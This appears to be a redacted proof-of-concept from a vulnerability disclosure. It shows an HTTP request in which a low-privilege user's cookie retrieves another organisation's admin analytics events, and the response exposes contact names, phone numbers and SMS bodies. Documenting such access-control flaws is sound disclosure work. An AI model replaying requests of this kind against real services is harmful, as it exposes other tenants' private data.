Proof-of-concept request:
POST /api/analytics/admin-events HTTP/2
Host: [REDACTED]
Content-Type: application/json
Cookie: token=<low_priv_user>
{
"json": {
"organisationId": "<target_org_id>",
"fromDate": "2026-03-24T06:03:45.531Z",
"toDate": "2026-04-23T06:03:45.531Z",
"page": 1,
"limit": 20
}
}
Response, truncated and redacted:
{
"json": {
"events": [
{
"organisation": { "name": "[Tenant name redacted]" },
"contact": {
"firstName": "[Redacted]",
"lastName": "[Redacted]",
"mobile": { "normalised": "+XX XXX XXX XXX" }
},
"eventContent": {
"data": "[SMS message body redacted]"
},
"type": "SMS Sent"
}
]
}
}